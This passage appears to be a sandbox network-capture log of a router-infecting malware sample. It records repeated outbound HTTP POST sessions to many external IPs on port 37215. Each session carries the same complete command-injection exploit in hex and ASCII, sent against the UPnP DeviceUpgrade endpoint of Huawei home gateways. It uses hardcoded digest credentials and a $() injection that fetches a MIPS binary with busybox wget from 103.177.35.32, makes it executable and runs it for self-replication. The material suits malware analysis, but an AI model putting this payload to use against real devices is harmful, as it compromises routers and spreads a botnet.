                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37192.168.2.235332896.83.169.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277375937 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        38192.168.2.2352778197.135.176.12337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277627945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        39192.168.2.234412662.95.212.18037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277632952 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        40192.168.2.234379899.113.98.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277633905 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        41192.168.2.2343322101.164.35.13937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277642965 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        42192.168.2.2346220197.105.39.12137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277647018 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        43192.168.2.2354734197.159.3.5637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277650118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        44192.168.2.233440441.199.127.11337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277650118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        45192.168.2.235835841.197.165.1637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277846098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        46192.168.2.234945641.241.30.15737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277853012 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
